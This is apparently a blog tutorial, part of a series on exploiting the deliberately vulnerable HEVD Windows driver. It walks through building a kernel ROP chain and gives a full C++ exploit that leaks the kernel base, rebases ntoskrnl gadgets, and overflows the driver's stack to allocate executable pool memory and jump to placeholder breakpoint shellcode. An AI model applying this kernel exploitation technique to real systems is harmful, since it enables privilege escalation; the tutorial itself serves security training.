[Cracking Windows Kernel with HEVD] Chapter 3: Can we ROP our way into triggering our shellcode?

Cracking HackSys Extreme Vulnerable Driver: Can we ROP our way into triggering our shellcode?

When are we building the payload here?

Patience! So far we have covered the basics needed to assemble a usable payload. Now that we have all the necessary tools, let’s finally create it. May the force be with us. If you missed the previous posts, make sure to check them out.

Our ROP chain should look something like this:

xor ecx, ecx; ret; -> zeroes out the rcx register, which holds the first parameter of ExAllocatePoolWithTag() (the pool type; 0 is NonPagedPool)
pop rdx; ret; -> pops 0x1000 (4096) into the rdx register, which holds the second parameter of ExAllocatePoolWithTag() and indicates the size of the pool
0x1000 -> value of rdx
ExAllocatePoolWithTag() -> calls the ExAllocatePoolWithTag function. The address of the allocated pool will then be in rax
mov rcx, rax; ret; -> copies the address to rcx, which will be the first parameter of memcpy (the destination)
pop rdx; ret; -> gets the source address from the stack. This will be our shellcode in userland that will escalate privileges.
<address of shellcode location in userland>
pop r8; ret; -> gets the size from the stack.
<size of our shellcode to be copied>
memcpy() -> calls the memcpy function and copies our payload to an executable kernel space
jmp rcx; -> jumps to a register which stores the address of our shellcode in kernel land

That sounds pretty complicated and will probably not work like that. We will most likely have to make a few adaptations. However, the plan is simple: allocate a writable and executable location in kernel land, copy our payload to it and then jump there. We need to find gadgets to do what we want. And for that, we shall use ropper. This tool will assist us in our ROP journey by helping us to find the gadgets.
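To make the plan concrete before hunting for gadgets, here is a minimal user-mode sketch of the three steps (allocate, copy, jump). Everything in it is a stand-in: `fake_allocate_pool` and `run_plan` are hypothetical names, the "pool" is an ordinary byte vector rather than kernel memory, and the final jump is deliberately left out.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Stand-in for ExAllocatePoolWithTag(NonPagedPool, size, tag). In the kernel
// this would return executable memory; here it is an ordinary byte vector.
std::vector<std::uint8_t> fake_allocate_pool(std::size_t size) {
    return std::vector<std::uint8_t>(size, 0);
}

// Mirrors the steps of the draft chain: allocate, then copy. The real chain
// would finish by jumping to the copy; this sketch only returns the buffer
// that would be executed.
std::vector<std::uint8_t> run_plan(const std::uint8_t* shellcode,
                                   std::size_t shellcode_size,
                                   std::size_t pool_size) {
    assert(shellcode_size <= pool_size);  // the copy must fit in the pool
    // Chain equivalent: rcx = 0 (pool type), rdx = pool_size, then the call.
    std::vector<std::uint8_t> pool = fake_allocate_pool(pool_size);
    // Chain equivalent: rcx = destination, rdx = source, r8 = size, then memcpy.
    std::memcpy(pool.data(), shellcode, shellcode_size);
    return pool;  // real chain: jump to the pool address
}
```

Calling `run_plan` with a few 0xcc bytes and a pool size of 0x1000 returns a 0x1000-byte buffer that starts with those bytes, which is the state the kernel pool should be in just before the final jump.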

We may copy ntoskrnl.exe to a machine in which ropper is installed and then look for gadgets!

Let’s fire ropper up!

And now…

This is what we have got:

0x38cf53: xor ecx, ecx; mov rax, rcx; ret; -> Zeroes out rcx register. Also zeroes out rax, but that is ok. Couldn't find a gadget that just turned rcx into 0.
0x416748: pop rdx; ret; -> pops 0x1000 (4096), just like we planned
0x1000 -> value of rdx and size of the buffer
ExAllocatePoolWithTag(); -> function to allocate an executable pool
0xa155de: add rsp, 0x20; ret; -> skips the shadow space of ExAllocatePoolWithTag; will be explained below
0x20a263: push rax; pop rbx; ret; -> Moving the address in rax to rbx for later use.
0x5af724: push rax; pop r13; ret; -> Moving the address in rax to r13
0x2c0da6: xchg r8, r13; ret; -> Now exchanging the values of r13 and r8
0x93ac7a: mov rcx, r8; mov rax, rcx; ret; -> Finally moving r8 to rcx, as we wished. A single gadget in our draft (mov rcx, rax; ret) was replaced by the last three gadgets. Gadgets are hard to find! We must improvise.
0x416748: pop rdx; ret; -> Popping the address of the shellcode to rdx
<ADDRESS OF SHELLCODE>
0x2017f1: pop r8; ret; -> Popping the size of the shellcode to r8
<SIZE OF SHELLCODE>
memcpy(); -> Address of memcpy function to copy our shellcode to the executable pool
0x408aa2: jmp rbx; -> Jumping to our shellcode. Remember we saved it for later use?

What a mess! This looks far from the payload we predicted. It’s messy and big. This happened because it is hard to find gadgets that fit our needs exactly. We often have to compromise and accept some collateral damage.
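To convince ourselves that the improvised gadgets really behave like the single `mov rcx, rax; ret` from the draft, we can model the registers involved. This is only a sketch: the `Regs` struct and `move_pool_address` are hypothetical helpers, and the model assumes rax holds the pool address when the first of these gadgets runs.

```cpp
#include <cassert>
#include <cstdint>
#include <utility>

// Only the registers the chain touches between the two function calls.
struct Regs {
    std::uint64_t rax = 0, rbx = 0, rcx = 0, r8 = 0, r13 = 0;
};

// Applies the four gadgets that follow ExAllocatePoolWithTag, in chain order.
// On entry, rax is assumed to hold the pool address returned by the call.
Regs move_pool_address(Regs r) {
    r.rbx = r.rax;           // push rax; pop rbx; ret  (saved for the final jmp rbx)
    r.r13 = r.rax;           // push rax; pop r13; ret
    std::swap(r.r8, r.r13);  // xchg r8, r13; ret
    r.rcx = r.r8;            // mov rcx, r8; ...
    r.rax = r.rcx;           // ... mov rax, rcx; ret
    return r;
}
```

After the sequence, rcx and rbx both hold the pool address, and the old value of r8 ends up in r13. That side effect is harmless here, because r8 is reloaded by `pop r8; ret` before memcpy is called.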

There is one more catch. Check ExAllocatePoolWithTag’s prologue:

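As we can see, it follows the Microsoft x64 calling convention (often called fastcall), which uses shadow space, AKA home space. In this convention, the caller must reserve 32 bytes on the stack, right above the return address, for the callee to use. ExAllocatePoolWithTag only uses 24 of them. In a ROP chain, those bytes are exactly where the next chain entries would sit, so the callee would overwrite them. This means that after ExAllocatePoolWithTag returns we must skip at least 0x18 bytes of the stack. I found an add rsp, 0x20 gadget that will do just fine. I place it right after ExAllocatePoolWithTag and leave 0x20 bytes of padding after it.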
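The arithmetic behind that padding can be checked with a few constant expressions. This is a sketch under the assumptions stated above (8-byte stack slots, home space starting right above the return address); the function names are made up for illustration, and offsets are measured from the chain entry that holds the function address.

```cpp
#include <cassert>
#include <cstddef>

constexpr std::size_t kSlot = 8;          // one stack slot on x64
constexpr std::size_t kHomeSpace = 0x20;  // four slots the callee may overwrite

// Entry 0 holds the function address and entry 1 its return address (our
// add-rsp gadget), so the home space starts at the third slot.
constexpr std::size_t home_space_begin() { return 2 * kSlot; }

// One past the last byte the callee is allowed to overwrite.
constexpr std::size_t home_space_end() { return home_space_begin() + kHomeSpace; }

// Offset of the chain entry that runs after "add rsp, N; ret": when the
// callee returns, rsp points at the third slot, then N is added to it.
constexpr std::size_t next_gadget_offset(std::size_t add_rsp_imm) {
    return 2 * kSlot + add_rsp_imm;
}

// True when the next entry lies beyond everything a callee that writes
// `bytes_used` bytes of home space can clobber.
constexpr bool chain_survives(std::size_t add_rsp_imm, std::size_t bytes_used) {
    return next_gadget_offset(add_rsp_imm) >= home_space_begin() + bytes_used;
}
```

With `add rsp, 0x20` the next entry lands at offset 0x30, which is right at the end of the home space, so the chain survives whether the callee uses 24 bytes or all 32.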

Here is what we have so far:

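#include <cstdio>
#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>

#define DEVICE_NAME	"\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
// Assumption: 0x800 is the function code of HEVD's stack overflow handler, as used in the previous posts
#define STACK_OVERFLOW_IOCTL_NUMBER IOCTL(0x800)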


//Gadgets
unsigned long long g_add_rsp_20h_ret = 0xa155de;

unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
unsigned long long g_pop_rdx_ret = 0x416748;
unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
unsigned long long g_pop_r8_ret = 0x2017f1;
unsigned long long g_jmp_rbx = 0x408aa2;
unsigned long long kernel_ExAllocatePoolWithTag;
unsigned long long kernel_memcpy;

// This will store the pid of the process whose privileges will be elevated
DWORD pid;


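// Gets kernel base addr (assumes the first entry returned by EnumDeviceDrivers is the kernel image)
unsigned long long get_kernel_base_addr() {
	LPVOID drivers[1024];
	DWORD cbNeeded;

	if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
		printf("EnumDeviceDrivers failed (%lu).\n", GetLastError());
		return 0;
	}

	return (unsigned long long)drivers[0];
}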

// Gets handle to driver
HANDLE get_handle() {
	HANDLE h = CreateFileA(DEVICE_NAME,
		FILE_READ_ACCESS | FILE_WRITE_ACCESS,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
		NULL);

	if (h == INVALID_HANDLE_VALUE) {
		printf("Failed to get handle =(\n");
		return NULL;
	}
	return h;
}

//Helper function to add gadget or address to payload and increment the offset automatically
void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
{
	memcpy(in_buffer + *offset, data, size);
	printf("Wrote %llx to offset %zu\n", *data, *offset);  // data is 64 bits wide, offset is a SIZE_T
	*offset += size;
}

//Looks up a kernel symbol
PVOID get_kernel_symbol_addr(const char *symbol) {
	PVOID kernelBaseAddr;
	HMODULE userKernelHandle;
	PCHAR functionAddress;
	unsigned long long offset;

	kernelBaseAddr = (PVOID)get_kernel_base_addr();  // Loaded kernel base address
	userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe");  // Opens kernel binary as lib

	if (userKernelHandle == NULL) {  // LoadLibraryA returns NULL on failure
		return NULL;
	}

	functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol);  // Locates the symbol address
	if (functionAddress == NULL) {
		return NULL;
	}

	offset = functionAddress - ((PCHAR)userKernelHandle);  // Subtracts the library base address in memory from the function addresses.
	return (PVOID)(((PCHAR)kernelBaseAddr) + offset);  // Adds the offset to the leaked kernel base address
}

// Auxiliary function to adjust the offsets for all the gadgets and used functions
void adjust_offsets()
{
	unsigned long long kernel_base_addr = get_kernel_base_addr();
	g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
	g_add_rsp_20h_ret += kernel_base_addr;
	g_pop_rdx_ret += kernel_base_addr;
	g_push_rax_pop_rbx_ret += kernel_base_addr;
	g_push_rax_pop_r13_ret += kernel_base_addr;
	g_xchg_r8_r13_ret += kernel_base_addr;
	g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_r8_ret += kernel_base_addr;
	g_jmp_rbx += kernel_base_addr;
	
	kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr("ExAllocatePoolWithTag");
	kernel_memcpy = (unsigned long long) get_kernel_symbol_addr("memcpy");
	printf("ExAllocatePoolWithTag: %llx\n", kernel_ExAllocatePoolWithTag);
	printf("memcpy: %llx\n", kernel_memcpy);
}

//Spawns a new cmd and returns the pid for the process
DWORD spawnCmd() {
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	char cmd[] = "C:\\Windows\\System32\\cmd.exe";

	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	// Start the child process (ANSI version, since cmd is a char array).
	if (!CreateProcessA(NULL,	// No module name (use command line)
		cmd,					// Command line
		NULL,					// Process handle not inheritable
		NULL,					// Thread handle not inheritable
		FALSE,					// Set handle inheritance to FALSE
		CREATE_NEW_CONSOLE,     // Open cmd in its own console window
		NULL,					// Use parent's environment block
		NULL,					// Use parent's starting directory 
		&si,					// Pointer to STARTUPINFOA structure
		&pi)					// Pointer to PROCESS_INFORMATION structure
		)
	{
		printf("CreateProcess failed (%lu).\n", GetLastError());
		return (DWORD)-1;
	}

	return pi.dwProcessId;
}


char *generate_shellcode() {
	//Generates and returns the shellcode to be executed after the ROP chain. This shellcode must do the heavy lifting to elevate privileges.
	//0x100 bytes matches size_of_copy in do_buffer_overflow, so memcpy never reads past this buffer.
	char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100);
	memset(shellcode, 0xcc, 0x100);
	return shellcode;
}

void do_buffer_overflow(HANDLE h)
{
	SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20; // 2072 is the offset of the return address; the chain has 15 8-byte entries plus 0x20 bytes of padding skipped by add rsp, 0x20.
	//Allocates memory for buffer
	PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
	//Fills with AAAAAAA...
	memset((char *)in_buffer, 'A', in_buffer_size);
	
	SIZE_T offset = 2072;

	//Spawns cmd and adjusts the pid
	pid = spawnCmd();
	//Adjust gadgets offsets
	adjust_offsets();
	//Our shellcode to escalate privileges. To be crafted!
	char *shellcode = generate_shellcode();

	//Size of the pool to allocate (0x1000, as planned in the chain)
	unsigned long long pool_size = 0x1000;
	//Arbitrary number of bytes to copy; must not exceed pool_size
	unsigned long long size_of_copy = 0x100;

	add_to_payload((char*)in_buffer, &offset, &g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &pool_size, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_ExAllocatePoolWithTag, 8);
	add_to_payload((char*)in_buffer, &offset, &g_add_rsp_20h_ret, 8);
	offset += 0x20;

	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_rbx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_xchg_r8_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_mov_rcx_r8_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, (unsigned long long *)(&shellcode), 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_r8_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_memcpy, 8);
	add_to_payload((char*)in_buffer, &offset, &g_jmp_rbx, 8);
	

	system("pause");
	printf("Sending buffer.\n");
	//Sends buffer
	DWORD bytes_returned = 0;  // must not be NULL when no OVERLAPPED structure is passed
	BOOL result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, &bytes_returned, NULL);
	if (!result)
	{
		printf("IOCTL Failed: %lX\n", GetLastError());
	}
	HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
}


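int main(int argc, char **argv)
{
	HANDLE h = get_handle();
	if (h == NULL) {
		return 1;  // get_handle already printed the error
	}
	do_buffer_overflow(h);
	CloseHandle(h);
	system("pause");
	return 0;
}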

The exploit is getting big. Let me explain some of the functions I have created:

add_to_payload: you provide the buffer you wish to write to, the current offset, a pointer to the value you wish to copy and the size. It copies that many bytes into the buffer at the given offset and then increments the offset by N, where N is the size provided.
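For readers who want to play with the idea outside of Windows, here is a portable sketch of the same helper. It is not the function used in the exploit: `append_to_payload` is a hypothetical variant that takes the value directly instead of a pointer, works on a `std::vector`, and adds bounds checks.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Portable variant of add_to_payload: copies `size` bytes of `value` into
// `buffer` at `*offset`, then advances `*offset` by `size`.
void append_to_payload(std::vector<std::uint8_t>& buffer, std::size_t* offset,
                       std::uint64_t value,
                       std::size_t size = sizeof(std::uint64_t)) {
    assert(size <= sizeof(value));            // never read past `value`
    assert(*offset + size <= buffer.size());  // never write past the buffer
    std::memcpy(buffer.data() + *offset, &value, size);
    *offset += size;
}
```

Because the offset is advanced on every call, the chain can be written as a plain sequence of calls in execution order, and skipping padding is just a matter of adding to the offset between two calls.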

generate_shellcode: this function allocates a buffer in userland, puts the shellcode for EoP in it and returns its address. The memcpy call in our ROP chain will copy the shellcode from this buffer to a kernel RWX region. For now, the buffer is just filled with 0xcc bytes (int 3 breakpoints), which trigger a trap upon execution.

spawnCmd: this spawns a new cmd and returns its pid. This is the process whose privileges we will elevate.

adjust_offsets: this function adds the kernel image base address to every gadget offset and resolves the kernel addresses of ExAllocatePoolWithTag and memcpy.
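The address arithmetic behind adjust_offsets and get_kernel_symbol_addr boils down to two small formulas, sketched here in portable C++. The helper names are hypothetical, and any base address passed to them in an experiment is a made-up value, not one taken from a real system.

```cpp
#include <cassert>
#include <cstdint>

// Gadget offsets found in the on-disk image are relative to the image base,
// so the runtime address is simply base + offset.
std::uint64_t rebase_gadget(std::uint64_t kernel_base, std::uint64_t gadget_offset) {
    return kernel_base + gadget_offset;
}

// An exported symbol is first located in a user-mode mapping of the same
// image. Its distance from that mapping's base is then applied to the
// kernel base.
std::uint64_t rebase_symbol(std::uint64_t kernel_base,
                            std::uint64_t user_module_base,
                            std::uint64_t user_symbol_addr) {
    assert(user_symbol_addr >= user_module_base);  // symbol lies inside the module
    return kernel_base + (user_symbol_addr - user_module_base);
}
```

For example, with a hypothetical kernel base of 0xfffff80000000000, the `pop rdx; ret` gadget at offset 0x416748 would end up at 0xfffff80000416748.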

This exploit triggers a stack-based overflow that executes our ROP chain on the stack. The ROP chain allocates executable (and writable) kernel memory and copies our shellcode into it. Then it jumps to this region of memory and executes our shellcode. The shellcode should contain instructions to elevate the privileges of our cmd process. Are you with me so far?
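If the buffer size in do_buffer_overflow looks like magic, the layout can be double-checked with a couple of constant expressions. This is a sketch that reuses the numbers from the listing (2072 bytes up to the return address, 15 chain entries, 0x20 bytes of padding after the fifth entry); the constant and function names are made up for illustration.

```cpp
#include <cassert>
#include <cstddef>

constexpr std::size_t kReturnAddressOffset = 2072;  // bytes before the saved return address
constexpr std::size_t kEntrySize = 8;               // each chain entry is one 64-bit value
constexpr std::size_t kChainEntries = 15;           // gadgets, constants and function addresses
constexpr std::size_t kPaddingAfter = 5;            // entries written before the padding
constexpr std::size_t kHomeSpacePadding = 0x20;     // skipped by add rsp, 0x20

// Total number of bytes sent to the driver.
constexpr std::size_t payload_size() {
    return kReturnAddressOffset + kChainEntries * kEntrySize + kHomeSpacePadding;
}

// Offset of the n-th chain entry (0-based). Entries 0..4 sit before the
// padding, entries 5..14 after it.
constexpr std::size_t entry_offset(std::size_t n) {
    return kReturnAddressOffset + n * kEntrySize +
           (n >= kPaddingAfter ? kHomeSpacePadding : 0);
}
```

The last entry (the `jmp rbx` gadget, index 14) ends exactly at `payload_size()`, so the buffer is neither too short nor longer than it needs to be.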

The exploit should trigger a trap on WinDBG. Let us try:

I DO NOT BELIEVE THIS WORKED! The debugger has caught our trap. Now “all” we have to do is craft a shellcode that will elevate privileges and return gracefully (or with as much grace as possible) to userland. But this will be a topic for the next post! See you then!